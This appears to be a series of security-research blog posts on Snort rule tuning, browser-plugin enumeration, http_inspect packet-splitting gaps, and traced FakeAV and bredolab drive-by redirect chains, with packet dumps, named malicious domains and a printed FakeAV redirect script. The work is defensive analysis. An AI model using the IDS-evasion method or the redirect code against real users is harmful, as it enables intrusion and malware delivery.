|
|
Started doing some Snort signature performance profiling and was somewhat shocked how many signatures were using nearly the exact same amount of processor time and were consuming quite a bit more processor than they should have. Below we have a few (but there are several more) sigs from the Emerging Threats rule set that were demonstrating this behavior:
SID: Checks: Proc:
2009810 138182 156828
2009805 138182 153896
So that is somewhat interesting that these are all checking the exact number of times and using so much more processor than other signatures. What do they have in common? Well lets just take a look at 2009805 and 2009810 and see:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Luder.B User-Agent (Mozilla/4.0 (SPGK)) - GET"; flow:established,to_server; content:"GET"; nocase; http_method; content:"User-Agent|3a| Mozilla/4.0 (SPGK)|0d 0a|"; nocase; http_header; reference:url,home.mcafee.com/VirusInfo/VirusProfile.aspx?key=212955#none; reference:url,www.threatexpert.com/threats/virus-win32-luder-b.html; reference:url,doc.emergingthreats.net/2009805; classtype:trojan-activity; sid:2009805; rev:4;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Swizzor-based Downloader - Invalid User-Agent (Mozilla/4.0 (compatible MSIE 7.0 na .NET CLR 2.0.50727 .NET CLR 3.0.4506.2152 .NET CLR 3.5.30729))"; flow:established,to_server; content:"GET"; nocase; http_method; content:"User-Agent|3a| Mozilla/4.0 (compatible|3b| MSIE 7.0|3b| na|3b| .NET CLR 2.0.50727|3b| .NET CLR 3.0.4506.2152|3b| .NET CLR 3.5.30729)|0d0a|"; http_header; reference:url,www.cyber-ta.org/releases/malware-analysis/public/2009-07-12-public/ARCHIVE/1247423556.chatter; reference:url,doc.emergingthreats.net/2009810; classtype:trojan-activity; sid:2009810; rev:5;)
So if we look at the content matches, we have this in common:
content:"User-Agent|3a| Mozilla/4.0 (SPGK)|0d 0a|";
content:"User-Agent|3a| Mozilla/4.0 (compatible|3b| MSIE 7.0|3b| na|3b| .NET CLR 2.0.50727|3b| .NET CLR 3.0.4506.2152|3b| .NET CLR 3.5.30729)|0d0a|";
Well if we remember that the VRT snort.conf file sets a max-pattern-length of 20 bytes to be searched for with the fast pattern matcher. The below line is from the Snort.conf that comes from VRT:
---SNIP---
config detection: search-method ac-split search-optimize max-pattern-len 20
---SNIP--
This means Snort will be looking for these values with the fast pattern matcher and then performing further checks later for the rest of the content string:
User-Agent: Mozilla/
User-Agent: Mozilla/
So we can use the fast_pattern matcher modifiers of offset and length to modify what portion of the content match we are looking for to be more specific look into what is truly unique about the strings we are searching for:
Usage: fast_pattern:<offset>,<length>;
Examples using fast_pattern’s offset and length that will cause us to now look for the following green highlighted strings first with the fast pattern matcher:
content:"User-Agent: Mozilla/4.0 (SPGK)|0d 0a|"; fast_pattern:24,8;
content:"User-Agent: Mozilla/4.0 (compatible\; MSIE 7.0\; na\; .NET CLR 2.0.50727\; .NET CLR 3.0.4506.2152\; .NET CLR 3.5.30729)|0D 0A|"; fast_pattern:37,13;
Updated signatures:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Luder.B User-Agent (Mozilla/4.0 (SPGK)) - GET"; flow:established,to_server; content:"GET"; http_method; content:"User-Agent: Mozilla/4.0 (SPGK)|0d 0a|"; fast_pattern:24,8; http_header; reference:url,home.mcafee.com/VirusInfo/VirusProfile.aspx?key=212955#none; reference:url,www.threatexpert.com/threats/virus-win32-luder-b.html; reference:url,doc.emergingthreats.net/2009805; classtype:trojan-activity; sid:2009805; rev:5;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Swizzor-based Downloader - Invalid User-Agent (Mozilla/4.0 (compatible MSIE 7.0 na .NET CLR 2.0.50727 .NET CLR 3.0.4506.2152 .NET CLR 3.5.30729))"; flow:established,to_server; content:"GET"; nocase; http_method; content:"User-Agent: Mozilla/4.0 (compatible\; MSIE 7.0\; na\; .NET CLR 2.0.50727\; .NET CLR 3.0.4506.2152\; .NET CLR 3.5.30729)|0D 0A|"; fast_pattern:37,13; http_header; reference:url,www.cyber-ta.org/releases/malware-analysis/public/2009-07-12-public/ARCHIVE/1247423556.chatter; reference:url,doc.emergingthreats.net/2009810; classtype:trojan-activity; sid:2009810; rev:6;)
In attempting to identify how vulnerable our clients environment is for drive by kits, we set about looking into enumerating the versions of Java, Acrobat and Flash that were tied into the browser specifically. We found a great collection of JavaScript called PluginDetect available and it actually has great options for code generation and really good documentation on how to use it. For our setup, we used the PluginDetect Script Generator and selected the following options under section 1:
- Java (we unchecked the “Enable NOTF” option that is selected by default)
- Flash
- Adobe PDF Reader
We just left sections 2-5 at the default settings and generated the script. Then we put the script, jar file and modified the default homepage on a webserver that we control that most people hit throughout the day. Good candidates for your environment might be an the blockpage for your web filter, internal portal or anything else that has lots of web traffic from your client network. First we put the generated PluginDetect.js file and the getJavaInfo.jar file that we pulled from the JavaDetect documentation page for PluginDetect into a js/ subdirectory. Once that was completed, we modified the index page to contain the relevant portions of the following example page being shown below. You can get rid of the second document.write where the versions are written out in HTML when you actually deploy, we just do this for example purposes:
<html>
<head>
<script type="text/javascript" src="js/PluginDetect.js"></script>
<script>
PluginDetect.getVersion(".");
var installedAcrobat = PluginDetect.isMinVersion("AdobeReader");
var AdobeReader = (status=1 ? true : false);
var installedJava = PluginDetect.isMinVersion('Java', '0', 'js/getJavaInfo.jar');
var Java = installedJava >=0 ? true : false;
var installedFlash = PluginDetect.isMinVersion("Flash");
var Flash = installedFlash >=0 ? true : false;
if (AdobeReader == true){
var versionAcrobat = PluginDetect.getVersion('AdobeReader');
document.write('<iframe src="acrobat.html?version=' + versionAcrobat + '" width="0" height="0" frameborder="0"></iframe>');
document.write('Acrobat Version: ' + versionAcrobat +'<br>');
}
if (Java == true){
var versionJava = PluginDetect.getVersion('Java', 'js/getJavaInfo.jar');
document.write('<iframe src="java.html?version=' + versionJava + '" width="0" height="0" frameborder="0"></iframe>');
document.write('Java Version: ' + versionJava +'<br>');
}
if (Flash == true){
var versionFlash = PluginDetect.getVersion('Flash');
document.write('<iframe src="flash.html?version=' + versionFlash + '" width="0" height="0" frameborder="0"></iframe>');
document.write('Flash Version: ' + versionFlash +'<br>');
}
</script>
</head>
<body>
</body>
</html>
We also created empty acrobat.html, java.html and flash.html files in the root directory where index.hml lies. This just helps clean up the web server logs so you don’t get lots of 404′s. We have a live running example you can check out here: http://trojanedbinaries.com/PluginDetect/. After this is running you can just grep through your webserver logs and normalize them based on source IP and extract all the info you want with just basic unix bin’s like grep/awk/sort.
We have been using the functionality provided by the http_inspect preprocessor for a while to develop our signatures but noticed a few times that it would not fire on HTTP requests from clients sometimes. After a little investigating, we noticed that the signatures would not fire whan an HTTP request is split across two packets (generally due to an extremely long URI and IE’s insanely long list of “Accept:” headers). Snort’s http_inspect preprocessor doesn’t get all the content from the multiple packets into the buffers which leads to some false negatives. Since the URI is very long and IE puts the “Host: ” header near the end of the request, it becomes easy to circumvent this type of detection against IE browsers that is based upon the HTTP host header unless you end up using jumbo frames which is not really feasible for most routing equipment, especially at gateways with substaintial amounts of bandwidth. Below is an example signature we are running to detect malvertising servers attempting to pass themselves off as a legitimate advertising servers owned by Microsoft (they own atdmt.com):
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"EID MALVERTISING request to view.atdmt.com.* host"; flow:established,to_server; content:"Host: view.atdmt.com."; http_header; content:!".302br.net"; distance:10; depth:10; classtype:bad-unknown; sid:5600118; rev:1;)
So we are just looking for requests that are to view.atdmt.com.* hosts (that does not include .302br.net as those are the globally distributed advertising servers actually owned by Microsoft). Below is the request to a malicious malvertising server that redirected a client to a drive by site. The non payload oriented portions of the packet have been blanked out with grey X‘s, bytes of the TCP stream added to the http_header are shown in green, bytes not added to the http_header are shown in black, content we are searching for has been highlighted in red:
0000 XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXXXXXXXXXXXXXXX
0010 XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXXXXXXXXXXXXXXX
0020 XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXXXXXXXXXXXXXXX
0030 XX XX XX XX XX XX 47 45 54 20 2f 4d 4f 4e 2f 69 XXXXXXGET /MON/i
0040 76 69 65 77 2f 64 6c 6e 6b 6b 6d 67 72 31 32 34 view/dlnkkmgr124
0050 35 33 36 31 33 31 6d 6f 6e 2f 64 69 72 65 63 74 536131mon/direct
0060 2f 30 31 2f 3f 74 69 6d 65 3d 30 2e 35 38 33 32 /01/?time=0.5832
0070 37 33 31 31 34 32 33 30 34 30 37 35 26 72 6e 3d 731142304075&rn=
0080 31 36 35 31 39 37 31 35 26 63 6c 69 63 6b 3d 68 16519715&click=h
0090 74 74 70 3a 2f 2f 75 73 2e 61 72 64 2e 79 61 68 ttp://us.ard.yah
00a0 6f 6f 2e 63 6f 6d 2f 53 49 47 3d 31 35 6f 6a 36 oo.com/SIG=15oj6
00b0 6a 72 37 71 2f 4d 3d 37 38 31 32 30 35 2e 31 34 jr7q/M=781205.14
00c0 33 32 32 32 39 36 2e 31 34 32 31 37 32 33 32 2e 322296.14217232.
00d0 32 38 38 35 33 39 2f 44 3d 6d 61 69 6c 5f 61 74 288539/D=mail_at
00e0 74 2f 53 3d 33 39 38 33 30 33 30 31 32 3a 4e 2f t/S=398303012:N/
00f0 5f 79 6c 74 3d 41 6f 58 79 4a 67 30 57 35 36 2e _ylt=AoXyJg0W56.
0100 77 45 39 4f 67 5f 50 54 58 50 64 30 6b 6e 37 30 wE9Og_PTXPd0kn70
0110 58 2f 59 3d 59 41 48 4f 4f 2f 45 58 50 3d 31 32 X/Y=YAHOO/EXP=12
0120 38 34 36 37 36 32 30 38 2f 4c 3d 2e 7a 69 35 4c 84676208/L=.zi5L
0130 55 6f 47 63 34 76 61 32 42 6e 6e 54 43 6f 34 4b UoGc4va2BnnTCo4K
0140 51 50 37 70 4a 38 38 41 6b 79 53 66 6c 41 41 43 QP7pJ88AkySflAAC
0150 42 51 76 2f 42 3d 53 6b 4f 58 4f 4e 6a 38 65 6c BQv/B=SkOXONj8el
0160 6f 2d 2f 4a 3d 31 32 38 34 36 36 39 30 30 38 35 o-/J=12846690085
0170 36 32 30 34 39 2f 4b 3d 43 52 61 34 33 31 41 5f 62049/K=CRa431A_
0180 77 56 75 62 43 75 57 5f 4e 62 67 79 6c 41 2f 41 wVubCuW_NbgylA/A
0190 3d 36 32 30 37 30 38 33 2f 52 3d 30 2f 2a 20 48 =6207083/R=0/* H
01a0 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a TTP/1.1..Accept:
01b0 20 69 6d 61 67 65 2f 67 69 66 2c 20 69 6d 61 67 image/gif, imag
01c0 65 2f 78 2d 78 62 69 74 6d 61 70 2c 20 69 6d 61 e/x-xbitmap, ima
01d0 67 65 2f 6a 70 65 67 2c 20 69 6d 61 67 65 2f 70 ge/jpeg, image/p
01e0 6a 70 65 67 2c 20 61 70 70 6c 69 63 61 74 69 6f jpeg, applicatio
01f0 6e 2f 78 2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c n/x-shockwave-fl
0200 61 73 68 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e ash, application
0210 2f 78 61 6d 6c 2b 78 6d 6c 2c 20 61 70 70 6c 69 /xaml+xml, appli
0220 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d 78 70 cation/vnd.ms-xp
0230 73 64 6f 63 75 6d 65 6e 74 2c 20 61 70 70 6c 69 sdocument, appli
0240 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 78 62 cation/x-ms-xb
Now here is the second packet in the request:
0000 XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXXXXXXXXXXXXXXX
0010 XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXXXXXXXXXXXXXXX
0020 XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXXXXXXXXXXXXXXX
0030 XX XX XX XX XX XX 61 70 2c 20 61 70 70 6c 69 63 XXXXXXap, applic
0040 61 74 69 6f 6e 2f 78 2d 6d 73 2d 61 70 70 6c 69 ation/x-ms-appli
0050 63 61 74 69 6f 6e 2c 20 61 70 70 6c 69 63 61 74 cation, applicat
0060 69 6f 6e 2f 76 6e 64 2e 6d 73 2d 65 78 63 65 6c ion/vnd.ms-excel
0070 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 76 6e , application/vn
0080 64 2e 6d 73 2d 70 6f 77 65 72 70 6f 69 6e 74 2c d.ms-powerpoint,
0090 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6d 73 77 application/msw
00a0 6f 72 64 2c 20 2a 2f 2a 0d 0a 52 65 66 65 72 65 ord, */*..Refere
00b0 72 3a 20 68 74 74 70 3a 2f 2f 75 73 2e 6d 63 38 r: http://us.mc8
00c0 30 34 2e 6d 61 69 6c 2e 79 61 68 6f 6f 2e 63 6f 04.mail.yahoo.co
00d0 6d 2f 6d 63 2f 6d 64 2e 70 68 70 3f 65 6e 3d 43 m/mc/md.php?en=C
00e0 50 31 32 35 32 26 76 3d 31 0d 0a 41 63 63 65 70 P1252&v=1..Accep
00f0 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 75 t-Language: en-u
0100 73 0d 0a 55 41 2d 43 50 55 3a 20 78 38 36 0d 0a s..UA-CPU: x86..
0110 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a Accept-Encoding:
0120 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 0d 0a gzip, deflate..
0130 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 User-Agent: Mozi
0140 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 74 69 lla/4.0 (compati
0150 62 6c 65 3b 20 4d 53 49 45 20 37 2e 30 3b 20 57 ble; MSIE 7.0; W
0160 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20 47 indows NT 5.1; G
0170 54 42 36 3b 20 2e 4e 45 54 20 43 4c 52 20 32 2e TB6; .NET CLR 2.
0180 30 2e 35 30 37 32 37 3b 20 2e 4e 45 54 20 43 4c 0.50727; .NET CL
0190 52 20 31 2e 31 2e 34 33 32 32 3b 20 2e 4e 45 54 R 1.1.4322; .NET
01a0 20 43 4c 52 20 33 2e 30 2e 30 34 35 30 36 2e 33 CLR 3.0.04506.3
01b0 30 3b 20 2e 4e 45 54 20 43 4c 52 20 33 2e 30 2e 0; .NET CLR 3.0.
01c0 30 34 35 30 36 2e 36 34 38 3b 20 2e 4e 45 54 20 04506.648; .NET
01d0 43 4c 52 20 33 2e 30 2e 34 35 30 36 2e 32 31 35 CLR 3.0.4506.215
01e0 32 3b 20 2e 4e 45 54 20 43 4c 52 20 33 2e 35 2e 2; .NET CLR 3.5.
01f0 33 30 37 32 39 29 0d 0a 48 6f 73 74 3a 20 76 69 30729)..Host: vi
0200 65 77 2e 61 74 64 6d 74 2e 63 6f 6d 2e 67 6f 6b ew.atdmt.com.gok
0210 72 65 61 6c 2e 63 6f 6d 0d 0a 43 6f 6e 6e 65 63 real.com..Connec
0220 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 tion: Keep-Alive
0230 0d 0a 0d 0a ....
So it appears that the http_inspect preprocessor is currently unable to reassemble bytes into the various buffers such as http_header (or any other buffer it creates to perform content matching against) when they are split across multiple packets. This is not something extremely new in the world of IDS as most of the detection that is done is at the frame/packet level (unless you are using flowbits). However it would be extremely helpful for detection (and especially for inline Snort IPS style deployments) for this functionality to be added to the http_inspect preprocessor. Once reassembled, the client request would look like the following and would be very easy to ensure that signatures would fire:
GET /MON/iview/dlnkkmgr124536131mon/direct/01/?time=0.5832731142304075&rn=16519715&click=http://us.ard.yahoo.com/SIG=15oj6jr7q/M=781205.14322296.14217232.288539/D=mail_att/S=398303012:N/_ylt=AoXyJg0W56.wE9Og_PTXPd0kn70X/Y=YAHOO/EXP=1284676208/L=.zi5LUoGc4va2BnnTCo4KQP7pJ88AkySflAACBQv/B=SkOXONj8elo-/J=1284669008562049/K=CRa431A_wVubCuW_NbgylA/A=6207083/R=0/* HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://us.mc804.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: view.atdmt.com.gokreal.com
Connection: Keep-Alive
For some time there has been a discrepancy between the snort.conf file that was distributed with the source code and the snort.conf file that has been distributed by SourceFire’s VRT group that is included in their rule downloads. We had discovered that this had a pretty serious effect on the users of the different versions of the configuration file and also how rules must be written differently dependant on which configuration you have. In this post we will be focusing on the http_inspect preprocessor configuration differences and the effect it is already having on your current Snort deployment. Pictured below is the http_inspect portion of the snort.conf file distributed with versions of Snort <= 2.8.6.1 (left) and the portion distributed with the VRT ruleset and versions of Snort >= 2.9.0-RC. Differences are highlighted in red:
One of the biggest things here is that the source version does not contain the “inspect_gzip” configuration option. So even if you take the time to compile Snort with the –enable-zlib option, the http_inspect preprocessor is not going to gunzip the compressed HTTP sessions for inspection. So all of your signatures looking for content in HTTP body responses from servers using mod_gzip will never fire ever if you are using the http_inspect configruation distributed with your Snort source code (we would guess this probably applies to most snort.conf’s included in various linux distros).
You may also notice the “enable_cookie” option. In the VRT version of the snort.conf file. This also has a pretty big effect on signature writing. Let us look at the follow signature we wrote to help use track SEO exploit kits:
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET DRIVEBY SEO kit ecountered - bmb cookie"; flow:established,to_client; content:"bmb=12"; http_cookie; classtype:bad-unknown; sid:5600064; rev:2;)
So in this signature we are looking for the response from an external server to have the string “bmb=12″ in the cookie field. This was written based on packets we were seeing like the following:
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: bmb=1279227526; expires=<REMOVED>
path=/; domain=ssladdon.in
Content-Length: 10507
Content-Disposition: inline; filename=index.html
<html><body>this is the body</body></html>
So when Snort processes the above packet, it splits the HTTP header apart into various buffers for analysis by the rules. One of the buffers it creates can be searched with a content:”foo” match by specifying http_cookie after the content search. This of course limits the searching of the packets being reviewed to only the http_cookie buffer that is filled up if a cookie is found in the header. So the above signature with the above packet will only fire if you use the VRT (right) version of the http_inspect configuration in the snort.conf file. The signature would not fire for the source (right) version. What is also unfortunate is if you use the VRT (right) version then if someone wrote rules that don’t check the buffers being created (like http_cookie) then the buffers and their contents are skipped over because the buffers are only checked if they are specified. So if you run the VRT (right) version and had the below signature, it will not fire either:
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET DRIVEBY SEO kit ecountered - bmb cookie"; flow:established,to_client; content:"bmb=12"; classtype:bad-unknown; sid:5600064; rev:2;)
This is because we are not specifying no buffer to search in the contents for even though we are creating them with the http_inspect configuration.
Please note, from here on out, the accuracy of what is being written may become slightly off but it is what we have observed when testing!
If you notice the coloring of the example packet, you can see that this HTTP response from the server is seperated into three different colors. The http_cookie is shown in green, http_header is shown in red, and lastly the rest of the packet that is not put into a specific buffer is shown in grey. So with the most previous signature we have discussed, will only check for the string “bmb=12″ in the contents of the packet shown in grey, so of course this will not cause the signature to alert. However if we looked for the string “bmb=12″ inside of the http_header, that also will not work. However if we look for the string “Set-Cookie: bmb=12″ in http_header, that DOES work. Why? I have no clue honestly. But if we look for the string “bmb=12″ inside of http_cookie, it will match which is to be expected.
We had alerted SourceFire to this discrepancy and the word we received back is that everyone should be using the VRT (right) version of the http_inspect configuration and that the config included with the source code not being updated was an oversight. It appears to have been fixed however as the current release candidate of Snort (2.9.0-RC) is being distributed with the updated VRT (right) version of the http_inspect configration. So if you have custom signatures or run signatures by other groups that look for things like user-agent strings or server versions inside of http_header, cookie values in http_cookie, etc, you really need to update them if you want to end up using this much more effecient configuration setup. However it is going to be a bit of a nightmare for people who have been using/writing signatures for the old style http_inspect configuration.
We have seen several pages created on extremely cheap name registrar/hosting services (the likes of co.cc and cz.cc primarily) that have images of specific things along with lots of related text about that specific image surrounding it in order to increase it within the Google Images search rankings. While this in and of its self is nothing new (people have been doing this since the dawn of search engines to up their hits) the fact that a user can keep their browser at www.google.com and load content from some malicious FakeAV or drive by kit is a bit of a game changer. This gives malicious people a very easy avenue to drive hits to their exploit kits without having to compromise massive amounts of wordpress blogs, run/defraud malicious types of advertising or produce tons of email spam. Below we go over one of the examples identified in the wild.
The URL we stumbled upon during research was as follows, yes this is real and live:
http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&h=370&w=441&sz=158&hl=en&start=8&zoom=1&um=1&itbs=1&tbnid=ut-iq_wdKMHNqM:&tbnh=107&tbnw=127&prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
If we review the contents of this URL, we notice that we have some different components to it:
www.google.com/imgres?imgurl= - Just good old Google Images
http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg - Location of an image file on the Internet. Nothing special about this either.
http://dzr4n.com/_vti_tmp/john-drake.html - Redirects users to a FakeAV scanner page if and only if you have a referrer from Google Images.
Now if we load this URL, this is what it will look like in Firefox with NoScript and Firebug running for a little bit of analysis:
You notice the user is just using google image search, but now www.google.com is loading up the content of that website within an IFRAME shown in the code snippet below:
<div id=il_fc><iframe src="http://dzr4n.com/_vti_tmp/john-drake.html" id=il_f frameborder=0 scrolling="no"></iframe>
Now, when we make a request to that server using the following referrer, the malicious server will provide the client with a redirect to the FakAV site. However if you go there directly you will see a garbage blog page with the picture (and several others from other sites) along with lots of tags and keywords related to various people named John Drake. Below are the request genereated by attempting to load the above IFRAME and the 302 HTTP status code redirect:
GET /_vti_tmp/john-drake.html HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&h=370&w=441&sz=158&hl=en&start=8&zoom=1&um=1&itbs=1&tbnid=ut-iq_wdKMHNqM:&tbnh=107&tbnw=127&prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: dzr4n.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Fri, 03 Sep 2010 22:34:40 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Location: http://dwedwedwed.co.cc/?777
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
You notice that it redirects to a domain we haven’t seen before in the disucussion, the dwedwedwed.co.cc/?777. This is because there are some intermediary servers that will eventually cause the client using Google Images to finally end up at the FakeAV site of froltartemo.cz.cc, here we show the following steps that are undertaken to get to the FakAV site:
GET /?777 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&h=370&w=441&sz=158&hl=en&start=8&zoom=1&um=1&itbs=1&tbnid=ut-iq_wdKMHNqM:&tbnh=107&tbnw=127&prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: dwedwedwed.co.cc
HTTP/1.1 302 Found
Date: Fri, 03 Sep 2010 22:38:10 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Expires: Thu, 21 Jul 1977 07:30:00 GMT
Last-Modified: Fri, 03 Sep 2010 22:38:10 GMT
Cache-Control: max-age=0
Pragma: no-cache
Set-Cookie: sid=1S2; expires=Sun, 05-Sep-2010 00:33:45 GMT; path=/
LOCATION: http://dwedwedwed.co.cc/t/bak.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html; charset=utf-8
....................
Causes the next request response:
GET /t/bak.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&h=370&w=441&sz=158&hl=en&start=8&zoom=1&um=1&itbs=1&tbnid=ut-iq_wdKMHNqM:&tbnh=107&tbnw=127&prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: dwedwedwed.co.cc
HTTP/1.1 200 OK
Date: Fri, 03 Sep 2010 22:38:11 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 243
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
</head>
<script language="JavaScript" type="text/javascript">
if (top.location != self.location) top.location = self.location;
</script>
<body>
<script>window.location="http://froltartemo.cz.cc/scanner15/?afid=60";</script>
</body>
</html>
Above we can see the use of a purposeful 404 that causes the client to finally get redirected to the FakeAV page. When this loads the browser is resized and hidden behind a prompt box in order to attempt to trick the user into downloading and executing a binary:
From there on out, it is somewhat up to how good your Antivirus solution is at detecting this stuff and the users willingness to click executables they may think they just downloaded from Google.
The bredolab infections we commonly see use compromised websites to redirect clients going to legitimate websites . This is in contrast to the SEO exploit sites that rely almost exclusively on malvertising for driving people to them. The amount of people driven to the bredolab boxes are not nearly as high as you might imagine and they really aren’t anymore difficult to track. Below we will go step by step through a client visiting a website until they became infected. Here we see the first request we are going to take note of. The user searched for a term in Google and clicked on a link that was within the results hosted on www.iwatchdocumentaries.com:
GET /documenatries/louis-theroux-americas-medicated-kids-2010/ HTTP/1.1
Accept: */*
Referer: http://www.google.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: www.iwatchdocumentaries.com
Connection: Keep-Alive
Now the response from this request is quite lengthy so we are going to trim it down a bit and focus on some JavaScript that is called from a streaming media providers site:
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 28978
Content-Type: text/html
Date: Fri, 13 Aug 2010 <OMITTED>
Keep-Alive: timeout=15, max=1000
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Set-Cookie: vid_count_<OMITTED>=<OMITTED>; expires=Sat, 13-Aug-2011 <OMITTED>
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch "Louis Theroux: America's Medicated Kids" (2010) Free - Watch Documentaries Online</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Watch Louis Theroux: America's Medicated Kids 2010 Online for free. Louis Theroux: America's Medicated Kids Summary: Faced with the challenging behaviour of their kids more and more parents in America are turning to psychoactive medication to help them cope even though the drugs and sometimes the diagnoses remain controversial. Louis travels to one of Americas leading childrens psychiatric treatment centres in Pit..." />
